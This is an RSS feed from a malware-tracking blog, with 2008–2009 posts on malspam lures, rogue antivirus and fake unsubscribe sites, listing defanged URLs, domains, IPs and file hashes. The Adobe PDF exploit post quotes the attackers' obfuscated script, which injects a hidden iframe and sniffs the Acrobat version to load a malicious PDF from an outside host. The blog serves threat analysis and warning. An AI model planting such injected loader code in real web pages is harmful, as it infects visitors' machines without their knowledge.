<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Malware Database &#187; MalSpam</title>
	<atom:link href="http://malwaredatabase.net/blog/index.php/cat/malspam/feed/" rel="self" type="application/rss+xml" />
	<link>http://malwaredatabase.net/blog</link>
	<description>Malware Database is a group of security professionals and a few hobbyists who each contribute to a private distributed database of malicious binaries while raising awareness on current malware trends through our website.</description>
	<lastBuildDate>Fri, 16 Jul 2010 07:11:02 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=abc</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>New rogue domain: hidef-porn-movies.com</title>
		<link>http://malwaredatabase.net/blog/index.php/2009/06/02/new-rogue-domain-hidef-porn-moviescom/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2009/06/02/new-rogue-domain-hidef-porn-moviescom/#comments</comments>
		<pubDate>Tue, 02 Jun 2009 18:28:54 +0000</pubDate>
		<dc:creator>djpnuemo</dc:creator>
				<category><![CDATA[Blackhat SEO]]></category>
		<category><![CDATA[Codec]]></category>
		<category><![CDATA[Infection]]></category>
		<category><![CDATA[MalSpam]]></category>
		<category><![CDATA[Malicious Domains]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Malware Distribution]]></category>
		<category><![CDATA[Rogue Security Software]]></category>
		<category><![CDATA[Rogue Software]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=1614</guid>
		<description><![CDATA[Another domain found distributing malware codecs and rogue anti-malware programs.  The referrer in this case was through y0utybe.com.
Whois entry for hidef-porn-movies.com 91.212.132.11
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note &#8211; All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

antispyware-for-all.com
antispyware-systems.com
free-antiviruses.com
free-tube-video-central.net
hidef-porn-movies.com
porn-tube-host.com
virus-analysis.com
xhost-xtubes.com
xmovies-host.com
xtubes-hot-porn.com
xtubes-online.com
xxx-movies-central.com
youporn-online.com
/promo1/ &#8211; Fake Adult-Archive.net page
/promo2/ &#8211; Fake PornTube page
/promo3/ &#8211; Fake scan page
/promo4/ &#8211; Fake SexTube page
Whois entry for y0utybe.com [...]]]></description>
			<content:encoded><![CDATA[<p>Another domain found distributing malware codecs and rogue anti-malware programs.  The referrer in this case was through y0utybe.com.</p>
<p><a href="http://whois.sc/hidef-porn-movies.com" target="_blank">Whois entry for hidef-porn-movies.com</a> 91.212.132.11<br />
PrivacyProtect.org<br />
Domain Admin (contact@privacyprotect.org)<br />
P.O. Box 97<br />
Note &#8211; All Postal Mails Rejected, visit Privacyprotect.org<br />
Moergestel<br />
null,5066 ZH<br />
NL<br />
Tel. +45.36946676</p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2009/06/as3.png" alt="" /><br />
antispyware-for-all.com<br />
antispyware-systems.com<br />
free-antiviruses.com<br />
free-tube-video-central.net<br />
hidef-porn-movies.com<br />
porn-tube-host.com<br />
virus-analysis.com<br />
xhost-xtubes.com<br />
xmovies-host.com<br />
xtubes-hot-porn.com<br />
xtubes-online.com<br />
xxx-movies-central.com<br />
youporn-online.com</p>
<p>/promo1/ &#8211; Fake Adult-Archive.net page<br />
/promo2/ &#8211; Fake PornTube page<br />
/promo3/ &#8211; Fake scan page<br />
/promo4/ &#8211; Fake SexTube page</p>
<p><a href="http://whois.sc/y0utybe.com" target="_blank">Whois entry for y0utybe.com</a> 216.195.60.231<br />
Whois Privacy Protection Service<br />
Whois Agent suqkgszqlv@whoisservices.cn<br />
+86.05922577888 fax: +86.05922577111<br />
Xiamen Software Park shengshi Building<br />
xiamen fujian 361005<br />
china</p>
<p><strong>softname.exe<br />
</strong>Result: <span id="porcentaje"><span style="color: red;">16</span>/40 (40%)</span><br />
MD5: aa33e33a6d0a650958c3fa0d1333d9f3<br />
<a href="http://www.virustotal.com/analisis/dfff42a82aa57bb0f3431cbac34aeb0e0fed3bd565a57ea2b3652e751d8d27c3-1243966989" target="_blank"> VirusTotal</a><br />
<a href="http://www.threatexpert.com/report.aspx?md5=aa33e33a6d0a650958c3fa0d1333d9f3" target="_blank"> ThreatExpert Analysis</a><br />
hxxp://hidef-porn-movies.com/promo2/get.php?aid=1226&amp;vname=softname</p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2009/06/02/new-rogue-domain-hidef-porn-moviescom/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fake Activation and Mailing List Unsubscribe Websites</title>
		<link>http://malwaredatabase.net/blog/index.php/2008/11/19/fake-activation-and-mailing-list-unsubscribe-websites/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2008/11/19/fake-activation-and-mailing-list-unsubscribe-websites/#comments</comments>
		<pubDate>Wed, 19 Nov 2008 15:00:46 +0000</pubDate>
		<dc:creator>mwdisector</dc:creator>
				<category><![CDATA[MalSpam]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[Email Collector]]></category>
		<category><![CDATA[Fake Activation]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=1178</guid>
		<description><![CDATA[In the past few days I&#8217;ve seen many websites pop up pretending to be mailing list unsubscription sites.  And per usual, these sites feature legit sounding names like antivirus-activation-code1.org or online-activation-code.info.

Example screenshot.
STAY AWAY from these because in reality they are being used to collect email addresses likely for future SPAM campaigns.  I also suspect these [...]]]></description>
			<content:encoded><![CDATA[<p>In the past few days I&#8217;ve seen many websites pop up pretending to be mailing list unsubscription sites.  And per usual, these sites feature legit sounding names like <strong>antivirus-activation-code1.org</strong> or online-activation-code.info.</p>
<p><a title="Fake unsubscribe" rel="lightbox[pics1178]" href="http://malwaredatabase.net/blog/wp-content/uploads/2008/11/fake-unsubscribe-email-harvestor3.jpg"><img class="attachment wp-att-1179 alignright" src="http://malwaredatabase.net/blog/wp-content/uploads/2008/11/fake-unsubscribe-email-harvestor3.thumbnail.jpg" alt="Fake unsubscribe" width="390" height="335" /></a></p>
<p>Example screenshot.</p>
<p>STAY AWAY from these because in reality they are being used to collect email addresses likely for future SPAM campaigns.  I also suspect these domains are part of a current fake XP activation SPAM campaign.</p>
<p>Domains involved:</p>
<p><strong>antivirus&#8211;activation&#8211;code1.org<br />
antivirus&#8211;activation-code2.org<br />
antivirus-activation&#8211;code1.org<br />
antivirus-activation-code1.org<br />
antivirus-activation-code2.org<br />
antivirus-activation&#8211;code.info<br />
antivirus&#8211;activation&#8211;code.info<br />
new-activation-code.info<br />
new&#8211;activation-code.info<br />
online-activation-code.info<br />
online&#8211;activation-code.info<br />
online-activation&#8211;code.info<br />
online&#8211;activation&#8211;code.info<br />
pdf-activation-code.info<br />
pdf&#8211;activation-code.info<br />
pdf-activation&#8211;code.info</strong></p>
<p>IPs associated with these:<br />
66.79.162.82<br />
67.209.140.130</p>
<p><strong>antivirus-activation&#8211;code2.org<br />
</strong>91.199.50.101<strong><br />
</strong></p>
<p><strong>BE ADVISED</strong>: These sites may still be active, be careful!</p>
<p>&#8211;mwdisector</p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2008/11/19/fake-activation-and-mailing-list-unsubscribe-websites/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SpamNuker</title>
		<link>http://malwaredatabase.net/blog/index.php/2008/09/25/spamnuker/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2008/09/25/spamnuker/#comments</comments>
		<pubDate>Thu, 25 Sep 2008 12:11:51 +0000</pubDate>
		<dc:creator>stingner</dc:creator>
				<category><![CDATA[Database Update]]></category>
		<category><![CDATA[MalSpam]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=646</guid>
		<description><![CDATA[Note: This site is distributing Rogue “Fake” Anti-Spam Malware product.  Do not visit, pay, or download the software discussed below.

Site: hxxp://spamnuker.com/

File: OutlookSpamNukerInstaller.exe
VirusTotal: Result 14/36 (38.89%)
File size: 29280 bytes
MD5&#8230;: 463de2ba97b8effef4b72430de51553b
SHA1..: 1eb9f02c925ef27c5e6a1086cb0c6c798c208eaf
SHA256: 7700a3c6a95ed1bb2dfb21567818c7bce55a5d178b28cc9040c528d7045f72eb
SHA512: b52f87db3390ecd2cd5726c3833c07a224d9c718cc8d4a421faef5f66d3f3a26
25d1a92c7bf288f67e4fba9f1fd63c40fd05b76ea85b149d6019a6a17e428bce
PEiD..: -
TrID..: File type identification
Windows Screen Saver (39.4%)
Win32 Executable Generic (25.6%)
Win32 Dynamic Link Library (generic) (22.8%)
Generic Win/DOS Executable (6.0%)
DOS Executable Generic (6.0%)
]]></description>
			<content:encoded><![CDATA[<p><strong>Note:</strong> This site is distributing Rogue “Fake” Anti-Spam Malware product.  Do not visit, pay, or download the software discussed below.</p>
<p style="center;"><a title="Spam Nuker" rel="lightbox[pics646]" href="http://malwaredatabase.net/blog/wp-content/uploads/2008/09/spamnuker1.gif"><img class="attachment wp-att-647 centered" src="http://malwaredatabase.net/blog/wp-content/uploads/2008/09/spamnuker1.gif" alt="Spam Nuker" width="500" height="414" /></a></p>
<p style="left;">Site: hxxp://spamnuker.com/</p>
<p style="left;">
<p style="left;">File: OutlookSpamNukerInstaller.exe<br />
VirusTotal: <a href="http://www.virustotal.com/analisis/fa5299d8235f36c0d1ec9b5ba9117946">Result 14/36 (38.89%)</a></p>
<p>File size: 29280 bytes<br />
MD5&#8230;: 463de2ba97b8effef4b72430de51553b<br />
SHA1..: 1eb9f02c925ef27c5e6a1086cb0c6c798c208eaf<br />
SHA256: 7700a3c6a95ed1bb2dfb21567818c7bce55a5d178b28cc9040c528d7045f72eb<br />
SHA512: b52f87db3390ecd2cd5726c3833c07a224d9c718cc8d4a421faef5f66d3f3a26<br />
25d1a92c7bf288f67e4fba9f1fd63c40fd05b76ea85b149d6019a6a17e428bce<br />
PEiD..: -<br />
TrID..: File type identification<br />
Windows Screen Saver (39.4%)<br />
Win32 Executable Generic (25.6%)<br />
Win32 Dynamic Link Library (generic) (22.8%)<br />
Generic Win/DOS Executable (6.0%)<br />
DOS Executable Generic (6.0%)</p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2008/09/25/spamnuker/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Virus Response Lab 2009</title>
		<link>http://malwaredatabase.net/blog/index.php/2008/09/16/virus-response-lab-2009/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2008/09/16/virus-response-lab-2009/#comments</comments>
		<pubDate>Tue, 16 Sep 2008 16:24:21 +0000</pubDate>
		<dc:creator>stingner</dc:creator>
				<category><![CDATA[Database Update]]></category>
		<category><![CDATA[MalSpam]]></category>
		<category><![CDATA[Malicious Domains]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Rogue Security Software]]></category>
		<category><![CDATA[Rogue Software]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=561</guid>
		<description><![CDATA[Note: This site is distributing Rogue “Fake” Anti-Malware product.  Do not visit, pay, or download the software discussed below.

Site:
* hxxp://viruslabs2009.com/
File: virlab_install.exe
VirusTotal: Result: 9/36 (25%)
File size: 1579973 bytes
MD5&#8230;: 93fef280425ad6fb002430abb8cf216d
SHA1..: 766a414faa1e062c0ce40f1ede93a3d166902b6c
SHA256: 4346309f29aacf14cd0fc764ccac674572a498b7f80e1a4018265008cbf1ba4c
SHA512: 371d231b30c32756be1dbd5b50e26144d506abe895a6893fdcea866b8353e310
8548ded05366e25c2d968dffa506880e8729b7b8a6b4f4e06c3814d903eba37e
PEiD..: -
TrID..: File type identification
Win64 Executable Generic (59.6%)
Win32 Executable MS Visual C++ (generic) (26.2%)
Win32 Executable Generic (5.9%)
Win32 Dynamic Link Library (generic) (5.2%)
Generic Win/DOS Executable [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Note:</strong> This site is distributing Rogue “Fake” Anti-Malware product.  Do not visit, pay, or download the software discussed below.</p>
<p style="center;"><a title="Virus response Lab 2009" rel="lightbox[pics561]" href="http://malwaredatabase.net/blog/wp-content/uploads/2008/09/viruslabs2009.gif"><img class="attachment wp-att-562 aligncenter" src="http://malwaredatabase.net/blog/wp-content/uploads/2008/09/viruslabs2009.gif" alt="Virus response Lab 2009" width="562" height="405" /></a></p>
<p>Site:</p>
<p style="60px;">* hxxp://viruslabs2009.com/</p>
<p>File: virlab_install.exe<br />
VirusTotal: <a title="VirusTotal" href="http://www.virustotal.com/analisis/7ef41133585ea5845b2d6385085035b4" target="_blank">Result: 9/36 (25%)</a><br />
File size: 1579973 bytes<br />
MD5&#8230;: 93fef280425ad6fb002430abb8cf216d<br />
SHA1..: 766a414faa1e062c0ce40f1ede93a3d166902b6c<br />
SHA256: 4346309f29aacf14cd0fc764ccac674572a498b7f80e1a4018265008cbf1ba4c<br />
SHA512: 371d231b30c32756be1dbd5b50e26144d506abe895a6893fdcea866b8353e310<br />
8548ded05366e25c2d968dffa506880e8729b7b8a6b4f4e06c3814d903eba37e<br />
PEiD..: -<br />
TrID..: File type identification<br />
Win64 Executable Generic (59.6%)<br />
Win32 Executable MS Visual C++ (generic) (26.2%)<br />
Win32 Executable Generic (5.9%)<br />
Win32 Dynamic Link Library (generic) (5.2%)<br />
Generic Win/DOS Executable (1.3%)</p>
<p>MDB: /stingner-malware/</p>
<h2>Removal:</h2>
<h2><span style="color: #ff0000;"><a href="http://remove.malwaredatabase.net" target="_blank">Remove this threat with MalwareBytes!</a></span></h2>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2008/09/16/virus-response-lab-2009/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Malspam: Notices from IRS (taxform_for_print.scr)</title>
		<link>http://malwaredatabase.net/blog/index.php/2008/09/07/malspam-notices-from-irs-taxform-for-print-scr/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2008/09/07/malspam-notices-from-irs-taxform-for-print-scr/#comments</comments>
		<pubDate>Mon, 08 Sep 2008 00:12:13 +0000</pubDate>
		<dc:creator>djpnuemo</dc:creator>
				<category><![CDATA[E-mail]]></category>
		<category><![CDATA[MalSpam]]></category>
		<category><![CDATA[Malicious Links]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Malware Distribution]]></category>
		<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[IRS]]></category>
		<category><![CDATA[Spam]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=443</guid>
		<description><![CDATA[<p style="text-align: left;"></p>
<p style="text-align: left;">Here is a piece of malspam we received that poses to be from the IRS telling you that you are due for a refund.  The one we got was from taxinform32@taxreducers.com.  Simply follow the steps below and the money is yours! (Proceed at your own risk. File available in /pnuemo-malware/.)</p>
<blockquote>
<p style="text-align: left;">Get Your Refund $1927.10 in Just 3 Easy Steps:<br />
1. Print and fill a short tax interview (click to download)<br />
2. Send it online<br />
3. Receive your tax refund</p></blockquote>
<p style="text-align: left;">The link included takes you to the following address and file: hxxp://freepromo.cn/documents/taxform_for_print.scr</p>
<p style="text-align: center;">
<p style="text-align: left;"><a href="http://malwaredatabase.net/blog/wp-content/uploads/2008/09/irs-malspam.jpg"><img class="aligncenter" src="http://malwaredatabase.net/blog/wp-content/uploads/2008/09/irs-malspam.jpg" alt="" width="230" height="300" /></a><strong></strong></p>
<p style="text-align: left;">
<p style="text-align: left;"><strong><span id="status_nombre">taxform_for_print.scr<br />
</span></strong>Result: <span id="porcentaje"><span style="color: red;">7</span>/36 (19.45%)<br />
MD5: </span>a705a1df1fc36f696f0eb0fea72870d3<br />
<a href="http://www.virustotal.com/analisis/cd38f2d6b50c36486d16d784a92f2b85" target="_blank">VirusTotal</a><br />
<a href="http://www.threatexpert.com/report.aspx?md5=a705a1df1fc36f696f0eb0fea72870d3" target="_blank"> ThreatExpert Analysis</a></p>
]]></description>
			<content:encoded><![CDATA[<p style="text-align: left;"></p>
<p style="text-align: left;">Here is a piece of malspam we received that poses to be from the IRS telling you that you are due for a refund.  The one we got was from taxinform32@taxreducers.com.  Simply follow the steps below and the money is yours! (Proceed at your own risk. File available in /pnuemo-malware/.)</p>
<blockquote>
<p style="text-align: left;">Get Your Refund $1927.10 in Just 3 Easy Steps:<br />
1. Print and fill a short tax interview (click to download)<br />
2. Send it online<br />
3. Receive your tax refund</p></blockquote>
<p style="text-align: left;">The link included takes you to the following address and file: hxxp://freepromo.cn/documents/taxform_for_print.scr</p>
<p style="text-align: center;">
<p style="text-align: left;"><a href="http://malwaredatabase.net/blog/wp-content/uploads/2008/09/irs-malspam.jpg"><img class="aligncenter" src="http://malwaredatabase.net/blog/wp-content/uploads/2008/09/irs-malspam.jpg" alt="" width="230" height="300" /></a><strong></strong></p>
<p style="text-align: left;">
<p style="text-align: left;"><strong><span id="status_nombre">taxform_for_print.scr<br />
</span></strong>Result: <span id="porcentaje"><span style="color: red;">7</span>/36 (19.45%)<br />
MD5: </span>a705a1df1fc36f696f0eb0fea72870d3<br />
<a href="http://www.virustotal.com/analisis/cd38f2d6b50c36486d16d784a92f2b85" target="_blank">VirusTotal</a><br />
<a href="http://www.threatexpert.com/report.aspx?md5=a705a1df1fc36f696f0eb0fea72870d3" target="_blank"> ThreatExpert Analysis</a></p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2008/09/07/malspam-notices-from-irs-taxform-for-print-scr/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Adobe Acrobat Reader PDF Exploit (gnu.pdf &amp; us.pdf) (UPDATED)</title>
		<link>http://malwaredatabase.net/blog/index.php/2008/08/31/adobe-acrobat-reader-pdf-exploit-gnu-pdf/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2008/08/31/adobe-acrobat-reader-pdf-exploit-gnu-pdf/#comments</comments>
		<pubDate>Sun, 31 Aug 2008 16:17:32 +0000</pubDate>
		<dc:creator>djpnuemo</dc:creator>
				<category><![CDATA[Database Update]]></category>
		<category><![CDATA[IFRAME]]></category>
		<category><![CDATA[MalSpam]]></category>
		<category><![CDATA[Malicious Links]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Rogue Software]]></category>
		<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=350</guid>
		<description><![CDATA[This morning we&#8217;ve found a website that automatically loads an infected pdf file.
When the user is directed to the infected site, there is a hidden iframe that loads the pdf file.  Here&#8217;s what happens&#8230;
Links still live, proceed at your own risk.
User visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included
&#60;script language=&#8221;javascript&#8221;&#62;document.write(unescape(&#8216;%3C%69%66%72
%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E
%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69
%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68
%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69
%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74
%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66
%72%61%6D%65%3E&#8217;));&#60;/script&#62;
when deobfuscated&#8230;
&#60;iframe src=&#8221;http://69.46.27.41/afxv/tpv/index.php&#8221; width=1 [...]]]></description>
			<content:encoded><![CDATA[<p>This morning we&#8217;ve found a website that automatically loads an infected pdf file.</p>
<p>When the user is directed to the infected site, there is a hidden iframe that loads the pdf file.  Here&#8217;s what happens&#8230;</p>
<p>Links still live, proceed at your own risk.</p>
<p>User visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included</p>
<blockquote><p>&lt;script language=&#8221;javascript&#8221;&gt;document.write(unescape(&#8216;%3C%69%66%72<br />
%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E<br />
%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69<br />
%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68<br />
%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69<br />
%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74<br />
%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66<br />
%72%61%6D%65%3E&#8217;));&lt;/script&gt;</p></blockquote>
<p>when deobfuscated&#8230;</p>
<blockquote><p>&lt;iframe src=&#8221;http://69.46.27.41/afxv/tpv/index.php&#8221; width=1 height=1 style=&#8221;visibility:hidden;position:absolute&#8221;&gt;&lt;/iframe&gt;</p></blockquote>
<p>We can see the hidden iframe above and the page includes the following code&#8230;</p>
<blockquote><p>&lt;script&gt;<br />
ppdf=0;<br />
i=0;<br />
for(;navigator.plugins[i];i++)<br />
{<br />
re=/.d.{2}e.A.{2}o&#8230;..l..-.+?([0-9]+.[0-9]+)/;<br />
if(res=re.exec(navigator.plugins[i].description))<br />
{<br />
ppdf=res[1];<br />
}<br />
var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;<br />
var res;<br />
if(res=re.exec(navigator.plugins[i].description))<br />
{<br />
flash=res[1]+&#8217;.'+res[2]+&#8217;.'+res[3];<br />
}<br />
}<br />
ppdfenable=0;<br />
if(ppdf!=0)<br />
{<br />
ppdfenable=0;<br />
ppdf=ppdf.replace(/\D/g,&#8221;");<br />
if(ppdf[0]==7 &amp;&amp; ppdf[1]&lt;1)ppdfenable=1;<br />
if(ppdf[0]&lt;7)ppdfenable=1;if(ppdfenable)<br />
{<br />
document.write(&#8216;&lt;iframe width=1 height=1 src=&#8221;hxxp://69.46.27.41/afxv/tpv/gnu.pdf&#8221;&gt;&lt;/iframe&gt;&#8217;);<br />
}<br />
}<br />
&lt;/script&gt;</p></blockquote>
<p>Thus leading us to the pdf in question located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf.  Here is additional information regarding this file.  This is also available in /pnuemo-malware/.</p>
<p><strong>gnu.pdf<br />
</strong>Result: 6/35 (17.15%)<br />
MD5: 213d20a0523b6ea6c93d4348a509c34c<br />
<a href="http://www.virustotal.com/analisis/91edb1fa2a19a49a673e98abb9667c16" target="_blank">VirusTotal</a></p>
<p>Update your software!</p>
<p><strong><span style="color: #00ff00;">UPDATED 9/1 12p PST</span></strong></p>
<p><strong>us.pdf</strong><br />
Result: 10/36 (27.78%)<br />
MD5: 8175212481f069a6dd54de9cbd044039<br />
<a href="http://www.virustotal.com/analisis/0349f58940681af73b496dfd9b8c1878" target="_blank">VirusTotal<br />
</a>hxxp://174.133.121.165/us.pdf<br />
hxxp://88.85.95.134/us.pdf</p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2008/08/31/adobe-acrobat-reader-pdf-exploit-gnu-pdf/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>YouTube Message Malspam</title>
		<link>http://malwaredatabase.net/blog/index.php/2008/08/27/youtube-message-malspam/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2008/08/27/youtube-message-malspam/#comments</comments>
		<pubDate>Thu, 28 Aug 2008 00:17:08 +0000</pubDate>
		<dc:creator>djpnuemo</dc:creator>
				<category><![CDATA[E-mail]]></category>
		<category><![CDATA[MalSpam]]></category>
		<category><![CDATA[Malicious Links]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=280</guid>
		<description><![CDATA[I received this in my inbox today from YouTube that someone had sent me a message.  The URL in the message takes the user through two redirects and then prompts the user to download a file.  This files is malware and currently has a low detection rate.  Here is the information I&#8217;ve [...]]]></description>
			<content:encoded><![CDATA[<p>I received this in my inbox today from YouTube that someone had sent me a message.  The URL in the message takes the user through two redirects and then prompts the user to download a file.  This files is malware and currently has a low detection rate.  Here is the information I&#8217;ve gathered.  All of the URL&#8217;s below are still live so proceed at your own risk.</p>
<p style="text-align: center;"><a title="sshot" rel="lightbox[pics280]" href="http://malwaredatabase.net/blog/wp-content/uploads/2008/08/sshot.jpg"><img class="attachment wp-att-282 centered aligncenter" src="http://malwaredatabase.net/blog/wp-content/uploads/2008/08/sshot.jpg" alt="sshot" width="500" height="183" /></a></p>
<p style="center;">
<p>hxxp://zz.gd/1d7d6a<br />
-&gt; hxxp://sghghdfgh.actionpooses.com/dfhgfhgfh<br />
&#8211;&gt; hxxp://actionpooses.com/livenow/live-now.htm<br />
&#8212;&gt; hxxp://212.179.35.9/Free-Girls-Cams-Viewer.exe</p>
<p><strong><span>Free-Girls-Cams-Viewer.exe<br />
</span></strong>Result: <span><span style="red;">6</span>/36 (16.67%)<br />
MD5: </span>716adbf47c6fffbd77604be9e9dd7043<br />
<a href="http://www.virustotal.com/analisis/a0ff35d080a8d8122d2aabfd4f129737" target="_blank">VirusTotal</a><br />
<a href="http://www.threatexpert.com/report.aspx?md5=716adbf47c6fffbd77604be9e9dd7043" target="_blank"> ThreatExpert Analysis</a></p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2008/08/27/youtube-message-malspam/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Britney Spears MalSpam points to mov.exe</title>
		<link>http://malwaredatabase.net/blog/index.php/2008/08/19/britney-spears-malspam-points-to-movexe/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2008/08/19/britney-spears-malspam-points-to-movexe/#comments</comments>
		<pubDate>Wed, 20 Aug 2008 00:52:44 +0000</pubDate>
		<dc:creator>lithium</dc:creator>
				<category><![CDATA[E-mail]]></category>
		<category><![CDATA[MalSpam]]></category>
		<category><![CDATA[Malicious Links]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Britney Spears]]></category>
		<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[Spam]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=215</guid>
		<description><![CDATA[We saw a new MalSpam today.  Unfortunately, it shows a very nasty picture of Britney Spears getting out of Paris Hilton&#8217;s car.   It fowards us to hxxp://www.lenapiel.com/mov.exe, which does not appear to be up at the time of our post.
Warning: The BSD daemon may not appear in the malspam you receive.  [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: left;">We saw a new MalSpam today.  Unfortunately, it shows a very nasty picture of Britney Spears getting out of Paris Hilton&#8217;s car.   It fowards us to hxxp://www.lenapiel.com/mov.exe, which does not appear to be up at the time of our post.</p>
<p style="text-align: center;">Warning: The BSD daemon may not appear in the malspam <em>you</em> receive.  You have been forewarned.</p>
<p style="text-align: center;"><a title="MalSpam" rel="lightbox[pics-1219192985]" href="http://malwaredatabase.net/blog/wp-content/uploads/2008/08/hotmovie.jpg"><img class="attachment wp-att-214 aligncenter" src="http://malwaredatabase.net/blog/wp-content/uploads/2008/08/hotmovie.jpg" alt="MalSpam" width="500" height="402" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2008/08/19/britney-spears-malspam-points-to-movexe/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&#8220;Weekly top news&#8221; (new)</title>
		<link>http://malwaredatabase.net/blog/index.php/2008/08/18/weekly-top-news-new/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2008/08/18/weekly-top-news-new/#comments</comments>
		<pubDate>Mon, 18 Aug 2008 20:29:22 +0000</pubDate>
		<dc:creator>quine</dc:creator>
				<category><![CDATA[MalSpam]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=190</guid>
		<description><![CDATA[In the same vein as the recent fake CNN and MSNBC malspam campaigns, a new one is floating around with the subject line of &#8220;Weekly top news&#8221;, with the sender&#8217;s name &#8220;Top News Agency&#8221;:

The content of the e-mail purports to link to a number of &#8220;breaking&#8221; news items and &#8220;shocking&#8221; videos:

The infected sites look rather [...]]]></description>
			<content:encoded><![CDATA[<p>In the same vein as the recent fake CNN and MSNBC malspam campaigns, a new one is floating around with the subject line of <strong>&#8220;Weekly top news&#8221;</strong>, with the sender&#8217;s name <strong>&#8220;Top News Agency&#8221;</strong>:</p>
<p style="center;"><a title="picture-21" rel="lightbox[pics190]" href="http://malwaredatabase.net/blog/wp-content/uploads/2008/08/picture-21.png"><img class="attachment wp-att-191 centered" src="http://malwaredatabase.net/blog/wp-content/uploads/2008/08/picture-21.thumbnail.png" alt="picture-21" width="344" height="30" /></a></p>
<p>The content of the e-mail purports to link to a number of &#8220;breaking&#8221; news items and &#8220;shocking&#8221; videos:</p>
<p style="center;"><a title="picture-1" rel="lightbox[pics190]" href="http://malwaredatabase.net/blog/wp-content/uploads/2008/08/picture-1.png"><img class="attachment wp-att-193 centered" src="http://malwaredatabase.net/blog/wp-content/uploads/2008/08/picture-1.thumbnail.png" alt="picture-1" width="327" height="70" /></a></p>
<p>The infected sites look rather plain (no images from <em>real</em> news sites) with another false video embed and &#8220;ActiveX Object Error&#8221;:</p>
